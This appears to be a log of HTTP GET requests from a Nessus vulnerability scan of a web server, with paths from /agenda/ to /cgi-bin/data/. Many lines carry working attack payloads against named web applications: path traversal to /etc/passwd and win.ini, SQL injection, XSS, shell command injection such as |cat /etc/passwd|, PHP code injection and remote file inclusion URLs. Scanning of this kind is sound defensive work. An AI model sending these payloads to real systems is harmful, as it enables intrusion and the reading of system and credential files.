GET /agenda/ HTTP/1.1
GET /agentes/ HTTP/1.1
GET /agora/ HTTP/1.1
GET /ajax.php?rs=__exp__getFeedContent&rsargs[]=-99%20UNION%20SELECT%20579548134%2c2%2c1138626202%2c4%2c5%2c6%2c7%2c8%2c9%2c0%2c1%2c2%2c3%20-- HTTP/1.1
GET /al_initialize.php?alpath=/etc/passwd%00 HTTP/1.1
GET /album.pl?function=about HTTP/1.1
GET /album/ HTTP/1.1
GET /albums/ HTTP/1.1
GET /alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1
GET /altercast/AlterCast?op=%3cscript%3ealert(%22adobe_document_server_61.nasl%22)%3c%2fscript%3e HTTP/1.1
GET /altercast/login.jsp HTTP/1.1
GET /am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login HTTP/1.1
GET /amazon/ HTTP/1.1
GET /amember/ HTTP/1.1
GET /amserver/ HTTP/1.1
GET /anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /analog/ HTTP/1.1
GET /angeline/ HTTP/1.1
GET /anthill/ HTTP/1.1
GET /antiboard.php?thread_id=' HTTP/1.1
GET /apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd%00 HTTP/1.1
GET /apache/ HTTP/1.1
GET /apex/f?p=nessuscheck HTTP/1.1
GET /apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd%00.html&passurl=/category/ HTTP/1.1
GET /api/orders.json?search[instance_eval]=Kernel.fail%20%60id%60 HTTP/1.1
GET /app/ HTTP/1.1
GET /app/idxasp.html HTTP/1.1
GET /app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=|id| HTTP/1.1
GET /applets/ HTTP/1.1
GET /application/ HTTP/1.1
GET /applications/ HTTP/1.1
GET /apps/ HTTP/1.1
GET /apps/pbcs.dll/misc?url=../../../../../../../../../../../../windows/win.ini HTTP/1.1
GET /apps/pbcs.dll/misc?url=../../../../../../../../../../../../winnt/win.ini HTTP/1.1
GET /apps/zxtm/login.cgi HTTP/1.1
GET /appserv/main.php?appserv_root=appserv_appserv_root_includes.nasl HTTP/1.1
GET /ar/ HTTP/1.1
GET /archive/ HTTP/1.1
GET /archives/ HTTP/1.1
GET /articles/ HTTP/1.1
GET /artifactory/webapp/home.html?0 HTTP/1.1
GET /ashnews.php?pathtoashnews=http://xxxxxxxx/ HTTP/1.1
GET /asp/ HTTP/1.1
GET /aspnet/ HTTP/1.1
GET /aspx/ HTTP/1.1
GET /asteridex/ HTTP/1.1
GET /atc/ HTTP/1.1
GET /athenareg.php?pass=%20;id HTTP/1.1
GET /atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /auction/ HTTP/1.1
GET /auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.1
GET /auktion/ HTTP/1.1
GET /auth.html?mode=login HTTP/1.1
GET /auth/ HTTP/1.1
GET /authadmin/ HTTP/1.1
GET /authenticate/login HTTP/1.1
GET /authentication/login/ HTTP/1.1
GET /authorization.do HTTP/1.1
GET /autodiscover/autodiscover.xml HTTP/1.0
GET /autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd HTTP/1.1
GET /autopass/login_input HTTP/1.1
GET /aw/ HTTP/1.1
GET /awstats-cgi/ HTTP/1.1
GET /awstats.cgi HTTP/1.1
GET /awstats.pl HTTP/1.1
GET /awstats/ HTTP/1.1
GET /awstats/cgi-bin/ HTTP/1.1
GET /awstatstotals.php?sort=\
GET /awstatstotals.php?sort={%24{passthru(chr(105).chr(100))}}{%24{exit()}} HTTP/1.1
GET /awstatstotals.php?sort={%24{phpinfo()}}{%24{exit()}} HTTP/1.1
GET /awstatstotals/ HTTP/1.1
GET /awstatstotals/awstatstotals.php?sort=\
GET /awstatstotals/awstatstotals.php?sort={%24{passthru(chr(105).chr(100))}}{%24{exit()}} HTTP/1.1
GET /awstatstotals/awstatstotals.php?sort={%24{phpinfo()}}{%24{exit()}} HTTP/1.1
GET /axis/DirectDownload.jsp HTTP/1.1
GET /axis2/ HTTP/1.1
GET /ayuda/ HTTP/1.1
GET /b/ HTTP/1.1
GET /b2-include/ HTTP/1.1
GET /b2-tools/gm-2-b2.php?b2inc=http://xxxxxxxx HTTP/1.1
GET /back/ HTTP/1.1
GET /backend/ HTTP/1.1
GET /backend/classes.php?include_path=../lib/jinzora.js%00 HTTP/1.1
GET /backup/ HTTP/1.1
GET /backups/ HTTP/1.1
GET /bad_permissions.html HTTP/1.1
GET /bak/ HTTP/1.1
GET /balancer/ HTTP/1.1
GET /banca/ HTTP/1.1
GET /banco/ HTTP/1.1
GET /bandwidth/index.cgi?action=showmonth&year=<scr ipt>foo</script>&month=<scr ipt>foo</script> HTTP/1.1
GET /bank/ HTTP/1.1
GET /banner/ HTTP/1.1
GET /banner01/ HTTP/1.1
GET /bannerexchange/ HTTP/1.1
GET /banners/ HTTP/1.1
GET /base/ HTTP/1.1
GET /base_local_rules.php?dir=<scr ipt>alert('base_local_rules_xss.nasl-1410939041')</script> HTTP/1.1
GET /base_main.php HTTP/1.1
GET /base_maintenance.php HTTP/1.1
GET /base_qry_common.php?BASE_path=/etc/passwd%00 HTTP/1.1
GET /basilic/Config/diff.php?file=%26id&new=1&old=2 HTTP/1.1
GET /basilix.php HTTP/1.1
GET /basilix/ HTTP/1.1
GET /batch/ HTTP/1.1
GET /bb-dnbd/ HTTP/1.1
GET /bb-hist.sh?HISTFILE=../../../../../etc/passwd HTTP/1.1
GET /bb-hostsvc.sh?HOSTSVC=../../../../../etc/passwd HTTP/1.1
GET /bb_func_txt.php?pathToFiles=/etc/passwd%00 HTTP/1.1
GET /bblog/index.php HTTP/1.1
GET /bbs/ HTTP/1.1
GET /bbv/ HTTP/1.1
GET /bdata/ HTTP/1.1
GET /bdatos/ HTTP/1.1
GET /bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /beta/ HTTP/1.1
GET /bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; HTTP/1.1
GET /bigipgui/bigconf.cgi?command=bigcommand&CommandType=bigpipe HTTP/1.0
GET /billing/billingmanager_income.asp HTTP/1.1
GET /billpay/ HTTP/1.1
GET /bin/ HTTP/1.1
GET /bin/html2text.php HTTP/1.1
GET /bitweaver/ HTTP/1.1
GET /bizmail.cgi HTTP/1.1
GET /biztalkhttpreceive.dll HTTP/1.1
GET /blazeds/messagebroker/http HTTP/1.1
GET /blob/ HTTP/1.1
GET /blog.cgi?submit=ViewFile&month=01&year=2004&file=|cat%20/etc/passwd| HTTP/1.1
GET /blog.php?f=&newmessage=&newremember=1&adminuser=1&newusername=php_update_var_overwrite.nasl HTTP/1.1
GET /blog/ HTTP/1.1
GET /blogs/ HTTP/1.1
GET /bmachine/ HTTP/1.1
GET /boadmin/ HTTP/1.1
GET /board/ HTTP/1.1
GET /board/db/users.dat HTTP/1.1
GET /boarddata/data/user.idx HTTP/1.1
GET /boastmachine/ HTTP/1.1
GET /boonex/ HTTP/1.1
GET /boot/ HTTP/1.1
GET /breakcal/calendar.cgi HTTP/1.1
GET /brightmail/login.do HTTP/1.1
GET /brightmail/viewLogin.do HTTP/1.1
GET /broadWeb/bwRoot.asp HTTP/1.1
GET /browse.php HTTP/1.1
GET /browseDirectory.jsp?dir=/ HTTP/1.1
GET /browse_blogs.php HTTP/1.1
GET /bsml.pl?action=sm HTTP/1.1
GET /btauxdir/ HTTP/1.1
GET /btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd HTTP/1.1
GET /bug/ HTTP/1.1
GET /bugport/php/index.php HTTP/1.1
GET /bugs/ HTTP/1.1
GET /bugzilla/ HTTP/1.1
GET /bugzilla3/ HTTP/1.1
GET /builtin/index.html HTTP/1.1
GET /business/ HTTP/1.1
GET /buy/ HTTP/1.1
GET /buynow/ HTTP/1.1
GET /c/ HTTP/1.1
GET /c100.php HTTP/1.1
GET /c32web.exe/GetImage?ImageName=cart32.ini%00.gif HTTP/1.1
GET /c99.php HTTP/1.1
GET /c99shell.php HTTP/1.1
GET /cache-stats/ HTTP/1.1
GET /cacti/ HTTP/1.1
GET /caja/ HTTP/1.1
GET /cal/ HTTP/1.1
GET /cal_cat.php?op=cats&year=2008&catview=1+UNION+SELECT+1,1410938917 HTTP/1.1
GET /cal_event.php?id=1'%20UNION%20SELECT%201%2c2%2c'calendarix_id_sql_injection.nasl'%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13-- HTTP/1.1
GET /cal_make.pl?p0=../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cal_week.php?op=week&catview=999' HTTP/1.1
GET /calendar.php?serverPath=/etc/passwd%00 HTTP/1.1
GET /calendar/ HTTP/1.1
GET /calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.1
GET /calendarexpress/ HTTP/1.1
GET /calendarix/ HTTP/1.1
GET /callboth.php?SEQ=654321&OUT=123456&IN=1410939080%40nessus%0d%0aasteridex_in_code_injection.nasl HTTP/1.1
GET /candypress/ HTTP/1.1
GET /captcha.html HTTP/1.1
GET /carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog HTTP/1.1
GET /card/ HTTP/1.1
GET /cards/ HTTP/1.1
GET /cart/ HTTP/1.1
GET /cart32.exe HTTP/1.1
GET /cas/login HTTP/1.1
GET /cash/ HTTP/1.1
GET /caspadmin/index.asp HTTP/1.1
GET /caspsamp/ HTTP/1.1
GET /catalog.php?action=category_show&id=' HTTP/1.1
GET /catalog/ HTTP/1.1
GET /caucho-status HTTP/1.1
GET /cbi-bin/ HTTP/1.1
GET /cc_guestbook.pl HTTP/1.1
GET /ccard/ HTTP/1.1
GET /ccards/ HTTP/1.1
GET /ccm/console.tcl? HTTP/1.1
GET /cd-cgi/ HTTP/1.1
GET /cd/ HTTP/1.1
GET /cdrom/ HTTP/1.1
GET /ce_html/ HTTP/1.1
GET /centreon/ HTTP/1.1
GET /cerberus-gui/ HTTP/1.1
GET /cerberus/ HTTP/1.1
GET /cert/ HTTP/1.1
GET /certificado/ HTTP/1.1
GET /certificate/ HTTP/1.1
GET /certsrv/ HTTP/1.1
GET /cfanywhere/index.html HTTP/1.1
GET /cfappman/ HTTP/1.1
GET /cfdocs/ HTTP/1.1
GET /cfide/ HTTP/1.1
GET /cfooter.php3 HTTP/1.1
GET /cgi HTTP/1.1
GET /cgi-auth/ HTTP/1.1
GET /cgi-bim/ HTTP/1.1
GET /cgi-bin/ HTTP/1.1
GET /cgi-bin/!pwds.txt HTTP/1.1
GET /cgi-bin/%2f/admin.html HTTP/1.1
GET /cgi-bin/%3f.jsp HTTP/1.1
GET /cgi-bin/.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./windows/win.ini HTTP/1.1
GET /cgi-bin/.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini HTTP/1.1
GET /cgi-bin//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/ HTTP/1.1
GET /cgi-bin//plugins/db/mysql/mysql.inc.php HTTP/1.1
GET /cgi-bin/1410938729-ror_session_fixation.nasl HTTP/1.1
GET /cgi-bin/500page.jsp HTTP/1.1
GET /cgi-bin/?Mode=debug HTTP/1.1
GET /cgi-bin/?cmd=Config HTTP/1.1
GET /cgi-bin/?ho+{COMPLETE_VERSION} HTTP/1.1
GET /cgi-bin/?mod=read&id=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/?p=subscribe HTTP/1.1
GET /cgi-bin/?showimage=')%20UNION%20SELECT%20'pixelpost_15rc1.nasl-1410938963.jpg'%20as%20id%2c%201533841112%20as%20headline%2c%201539068002%20as%20datetime%2c%20296141149%20as%20body%2c%20172091270%20as%20category%2c%201163717103%20as%20image-- HTTP/1.1
GET /cgi-bin/?user=jffnms_user_sql_injection.nasl'%20UNION%20SELECT%202%2c'admin'%2c'%241%24RxS1ROtX%24IzA1S3fcCfyVfA9rwKBMi.'%2c'Administrator'--&file=index&pass= HTTP/1.1
GET /cgi-bin/About/frmAbout.aspx HTTP/1.1
GET /cgi-bin/Admin.php HTTP/1.1
GET /cgi-bin/BrowserWeb/portal/portalbanner.htm HTTP/1.1
GET /cgi-bin/CFIDE/probe.cfm HTTP/1.1
GET /cgi-bin/CategoryView.aspx?category=nessus HTTP/1.1
GET /cgi-bin/ChangeLog HTTP/1.1
GET /cgi-bin/Config/diff.php?file=%26id&new=1&old=2 HTTP/1.1
GET /cgi-bin/Count.cgi?align=topcenter HTTP/1.1
GET /cgi-bin/Edit.jsp?page=User&editor=../../../Install HTTP/1.1
GET /cgi-bin/GTcatalog/index.php?function=custom&custom=http://xxxxxxxx/1 HTTP/1.1
GET /cgi-bin/GTcatalog/password.inc HTTP/1.1
GET /cgi-bin/PJreview_Neo.cgi?p=../../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/README.TXT HTTP/1.1
GET /cgi-bin/SLwebmail/ShowLogin.dll?Language=fr HTTP/1.1
GET /cgi-bin/SPT--ForumTopics.php?forumid=-9%20UNION%20SELECT%20null%2cnull%2cnull%2c1410939058%2c4%2c5 HTTP/1.1
GET /cgi-bin/Security/login HTTP/1.1
GET /cgi-bin/ServerView/SnmpView/SnmpListMibValues?SSL=&Server=(ip addr)&ThisApplication=TestConnectivityFirst&ServerName=bcmes&Servername=127.0.0.1;id;,SType--Server&ParameterList=What--primary,,OtherCommunity--{{OtherCommunity}},,SecondIP--,,Timeout--5,,Community--public,,SType--,,ASPresent--1 HTTP/1.1
GET /cgi-bin/SystemInfo HTTP/1.1
GET /cgi-bin/UI/Login?user=nessus-1410938469 HTTP/1.1
GET /cgi-bin/Web_Store/web_store.cgi?page=../../../../../../etc/passwd%00.html HTTP/1.1
GET /cgi-bin/WihPhoto/start.php HTTP/1.1
GET /cgi-bin/WorkArea/ContentDesigner/ekformsiframe.aspx?id=\
GET /cgi-bin/YaBB.pl HTTP/1.1
GET /cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/Z4UIbRKguuPS.asp HTTP/1.1
GET /cgi-bin/Z4UIbRKguuPS.cfm HTTP/1.1
GET /cgi-bin/Z4UIbRKguuPS.cgi HTTP/1.1
GET /cgi-bin/Z4UIbRKguuPS.html HTTP/1.1
GET /cgi-bin/Z4UIbRKguuPS.inc HTTP/1.1
GET /cgi-bin/Z4UIbRKguuPS.php HTTP/1.1
GET /cgi-bin/Z4UIbRKguuPS.php3 HTTP/1.1
GET /cgi-bin/Z4UIbRKguuPS.pl HTTP/1.1
GET /cgi-bin/Z4UIbRKguuPS.sh HTTP/1.1
GET /cgi-bin/Z4UIbRKguuPS.shtml HTTP/1.1
GET /cgi-bin/_admin/ HTTP/1.1
GET /cgi-bin/_head.php?_zb_path=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/a1stats/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/about.php HTTP/1.1
GET /cgi-bin/account/?action=Login HTTP/1.1
GET /cgi-bin/account/login.php HTTP/1.1
GET /cgi-bin/acegilogin.jsp HTTP/1.1
GET /cgi-bin/achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/ HTTP/1.1
GET /cgi-bin/acp/index.php HTTP/1.1
GET /cgi-bin/acp/lib/inserts.sql HTTP/1.1
GET /cgi-bin/activatemember?activatecode=&member=%22%3e%3cscript%3ealert('mvnforum_activatemember_xss.nasl')%3c%2fscript%3e HTTP/1.1
GET /cgi-bin/add.cgi HTTP/1.1
GET /cgi-bin/add_url.htm?node=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1
GET /cgi-bin/add_user.php HTTP/1.1
GET /cgi-bin/addentry.php HTTP/1.1
GET /cgi-bin/addschup HTTP/1.1
GET /cgi-bin/adlayer.php?layerstyle=../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/admin.php HTTP/1.1
GET /cgi-bin/admin.php?dpt=conf&sub=general HTTP/1.1
GET /cgi-bin/admin.php?loggedin=1 HTTP/1.1
GET /cgi-bin/admin.php?style=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/admin.php?zfaction=config HTTP/1.1
GET /cgi-bin/admin.pl?path=bin/mozilla&action=list_users HTTP/1.1
GET /cgi-bin/admin/ HTTP/1.1
GET /cgi-bin/admin/addentry.php?phpbb_root_path=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/admin/admin.php HTTP/1.1
GET /cgi-bin/admin/admin.php?sid=' HTTP/1.1
GET /cgi-bin/admin/admin.php?sid=0' HTTP/1.1
GET /cgi-bin/admin/cal_login.php HTTP/1.1
GET /cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1410938915 HTTP/1.1
GET /cgi-bin/admin/configset.php?settings_dir=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/admin/connect.inc HTTP/1.1
GET /cgi-bin/admin/define.inc.php?match=http://xxxx./ HTTP/1.1
GET /cgi-bin/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/admin/general.php?mode=perlinfo&config[General][perl_binary]=cat%20/etc/passwd|| HTTP/1.1
GET /cgi-bin/admin/index.html HTTP/1.1
GET /cgi-bin/admin/index.php?act=login&username='%20UNION%20SELECT%201,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus HTTP/1.1
GET /cgi-bin/admin/index.php?cmd=login HTTP/1.1
GET /cgi-bin/admin/index.php?username=advanced_poll_var_overwrite.nasl&pollvars[poll_username]=advanced_poll_var_overwrite.nasl&password=201019345&pollvars[poll_password]=71e2903bd3e297cd00c84836d034a6bb HTTP/1.1
GET /cgi-bin/admin/ip_manage.php HTTP/1.1
GET /cgi-bin/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][cmsmadesimple_nls_file_include.nasl][1]=/etc/passwd&nls[file][cmsmadesimple_nls_file_include.nasl][2]=../COPYING HTTP/1.1
GET /cgi-bin/admin/login-default.do HTTP/1.1
GET /cgi-bin/admin/login.html HTTP/1.1
GET /cgi-bin/admin/login.php HTTP/1.1
GET /cgi-bin/admin/login/ HTTP/1.1
GET /cgi-bin/admin/login/index.php HTTP/1.1
GET /cgi-bin/admin/o12guest.mdb HTTP/1.1
GET /cgi-bin/admin/objects.inc.php4?Server[path]=http://xxxxxx&Server[language_file]=nessus.php HTTP/1.1
GET /cgi-bin/admin/operators.php?view HTTP/1.1
GET /cgi-bin/admin/plog-admin-functions.php?config[basedir]=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/admin/registry.jsp HTTP/1.1
GET /cgi-bin/admin/remotecontrol/lsrc.server.php?wsdl HTTP/1.1
GET /cgi-bin/admin/setup.php HTTP/1.1
GET /cgi-bin/admin/system?wt=xml HTTP/1.1
GET /cgi-bin/admin/templates/header.php?admin_root=http://xxxxxxxx. HTTP/1.1
GET /cgi-bin/admin/top.php?admindir=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/admin/users.php HTTP/1.1
GET /cgi-bin/admincp/login.php HTTP/1.1
GET /cgi-bin/administrator/index.php HTTP/1.1
GET /cgi-bin/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7b%7dsystem(id)%3bclass%20zZz_ADOConnection%7b%7d%2f%2f HTTP/1.1
GET /cgi-bin/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /cgi-bin/adxmlrpc.php HTTP/1.1
GET /cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1
GET /cgi-bin/agenda.php3 HTTP/1.1
GET /cgi-bin/ajax.php?rs=__exp__getFeedContent&rsargs[]=-99%20UNION%20SELECT%20579548134%2c2%2c1138626202%2c4%2c5%2c6%2c7%2c8%2c9%2c0%2c1%2c2%2c3%20-- HTTP/1.1
GET /cgi-bin/al_initialize.php?alpath=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/album.pl?function=about HTTP/1.1
GET /cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1
GET /cgi-bin/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login HTTP/1.1
GET /cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd%00.html&passurl=/category/ HTTP/1.1
GET /cgi-bin/api/orders.json?search[instance_eval]=Kernel.fail%20%60id%60 HTTP/1.1
GET /cgi-bin/apps/pbcs.dll/misc?url=../../../../../../../../../../../../windows/win.ini HTTP/1.1
GET /cgi-bin/apps/pbcs.dll/misc?url=../../../../../../../../../../../../winnt/win.ini HTTP/1.1
GET /cgi-bin/artifactory/webapp/home.html?0 HTTP/1.1
GET /cgi-bin/ashnews.php?pathtoashnews=http://xxxxxxxx/ HTTP/1.1
GET /cgi-bin/athenareg.php?pass=%20;id HTTP/1.1
GET /cgi-bin/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/awstats.cgi HTTP/1.1
GET /cgi-bin/awstats.pl HTTP/1.1
GET /cgi-bin/awstatstotals.php?sort=\
GET /cgi-bin/awstatstotals.php?sort={%24{passthru(chr(105).chr(100))}}{%24{exit()}} HTTP/1.1
GET /cgi-bin/awstatstotals.php?sort={%24{phpinfo()}}{%24{exit()}} HTTP/1.1
GET /cgi-bin/b2-tools/gm-2-b2.php?b2inc=http://xxxxxxxx HTTP/1.1
GET /cgi-bin/backend/classes.php?include_path=../lib/jinzora.js%00 HTTP/1.1
GET /cgi-bin/bandwidth/index.cgi?action=showmonth&year=<scr ipt>foo</script>&month=<scr ipt>foo</script> HTTP/1.1
GET /cgi-bin/base_local_rules.php?dir=<scr ipt>alert('base_local_rules_xss.nasl-1410939041')</script> HTTP/1.1
GET /cgi-bin/base_main.php HTTP/1.1
GET /cgi-bin/base_maintenance.php HTTP/1.1
GET /cgi-bin/base_qry_common.php?BASE_path=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/basilix.php HTTP/1.1
GET /cgi-bin/bb-hist.sh?HISTFILE=../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/bb_func_txt.php?pathToFiles=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/bblog/index.php HTTP/1.1
GET /cgi-bin/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; HTTP/1.1
GET /cgi-bin/billing/billingmanager_income.asp HTTP/1.1
GET /cgi-bin/bin/html2text.php HTTP/1.1
GET /cgi-bin/bizmail.cgi HTTP/1.1
GET /cgi-bin/biztalkhttpreceive.dll HTTP/1.1
GET /cgi-bin/blog.cgi?submit=ViewFile&month=01&year=2004&file=|cat%20/etc/passwd| HTTP/1.1
GET /cgi-bin/blog.php?f=&newmessage=&newremember=1&adminuser=1&newusername=php_update_var_overwrite.nasl HTTP/1.1
GET /cgi-bin/boarddata/data/user.idx HTTP/1.1
GET /cgi-bin/breakcal/calendar.cgi HTTP/1.1
GET /cgi-bin/browse.php HTTP/1.1
GET /cgi-bin/browse_blogs.php HTTP/1.1
GET /cgi-bin/bsml.pl?action=sm HTTP/1.1
GET /cgi-bin/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/c32web.exe/GetImage?ImageName=cart32.ini%00.gif HTTP/1.1
GET /cgi-bin/cal_cat.php?op=cats&year=2008&catview=1+UNION+SELECT+1,1410938917 HTTP/1.1
GET /cgi-bin/cal_event.php?id=1'%20UNION%20SELECT%201%2c2%2c'calendarix_id_sql_injection.nasl'%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13-- HTTP/1.1
GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/cal_week.php?op=week&catview=999' HTTP/1.1
GET /cgi-bin/calendar.php?serverPath=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.1
GET /cgi-bin/callboth.php?SEQ=654321&OUT=123456&IN=1410939080%40nessus%0d%0aasteridex_in_code_injection.nasl HTTP/1.1
GET /cgi-bin/camctrl.cgi HTTP/1.1
GET /cgi-bin/captcha.html HTTP/1.1
GET /cgi-bin/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog HTTP/1.1
GET /cgi-bin/cart32.exe HTTP/1.1
GET /cgi-bin/catalog.php?action=category_show&id=' HTTP/1.1
GET /cgi-bin/cc_guestbook.pl HTTP/1.1
GET /cgi-bin/cfooter.php3 HTTP/1.1
GET /cgi-bin/cgi-bin/gm-comments.cgi HTTP/1.1
GET /cgi-bin/cgi-bin/library.cgi HTTP/1.1
GET /cgi-bin/cgi-bin/login.cgi HTTP/1.1
GET /cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/cgiforum.pl?thesection=../../../../../../../../etc/passwd%00 HTTP/1.1
GET /cgi-bin/cgiip.exe/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
GET /cgi-bin/cgiip.exe/WService=wsbroker1/webutil/ping.p HTTP/1.1
GET /cgi-bin/cgiwrap/cgiwrap_error_page_handling_xss.nasl HTTP/1.1
GET /cgi-bin/chat.php HTTP/1.1
GET /cgi-bin/chat/login.php?option=chat HTTP/1.1
GET /cgi-bin/check_user_id.php?user_id=<scr ipt>foo</script> HTTP/1.1
GET /cgi-bin/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/classes/adodbt/sql.php?classes_dir=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/client_execute.cgi?tUD=0 HTTP/1.1
GET /cgi-bin/clwarn.cgi HTTP/1.1
GET /cgi-bin/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/com5.pl HTTP/1.1
GET /cgi-bin/comments.php HTTP/1.1
GET /cgi-bin/comments.php?sort_by=phpwebgallery_sort_by_sql_injection.nasl HTTP/1.1
GET /cgi-bin/commerce.cgi?page=../../../../../etc/passwd%00index.html HTTP/1.1
GET /cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| HTTP/1.1
GET /cgi-bin/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /cgi-bin/config.php?path[docroot]=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/config.php?returnpath=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/config/oramon.ini HTTP/1.1
GET /cgi-bin/configuration/galleryConfig.txt HTTP/1.1
GET /cgi-bin/console/login.action HTTP/1.1
GET /cgi-bin/contact.php HTTP/1.1
GET /cgi-bin/contacts/php?cal_dir=http://xxxxxxxx/ HTTP/1.1
GET /cgi-bin/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/content.php?get_action=display_doc&doc_file=CREDITS HTTP/1.1
GET /cgi-bin/contrib/forms/evaluation/C_FormEvaluation.class.php?fileroot=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /cgi-bin/core/api.php?t_path_core=/etc/passwd%00 HTTP/1.1
GET /cgi-bin/core/editor.php?editor_insert_bottom=/etc/passwd HTTP/1.1
GET /cgi-bin/corporate/webpages/login.jsp HTTP/1.1
GET /cgi-bin/corporate/webpages/sessionexpired.jsp HTTP/1.1
GET /cgi-bin/counter.php?count_log_file=/nessus HTTP/1.1
GET /cgi-bin/crossdomain.xml HTTP/1.1
GET /cgi-bin/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini HTTP/1.1
GET /cgi-bin/csSearch.cgi?command=savesetup&setup=print%20`id` HTTP/1.1
GET /cgi-bin/csv_db.cgi?file=|id| HTTP/1.1
GET /cgi-bin/ctrldirect.cgi HTTP/1.1
GET /cgi-bin/customer.pl HTTP/1.1
GET /cgi-bin/cvslog.cgi?file=<scr ipt>window.alert</SCRIPT> HTTP/1.1
GET /cgi-bin/cwmail.exe HTTP/1.1
GET /cgi-bin/dada/ HTTP/1.1
GET /cgi-bin/data/fetch.php?page=' HTTP/1.1
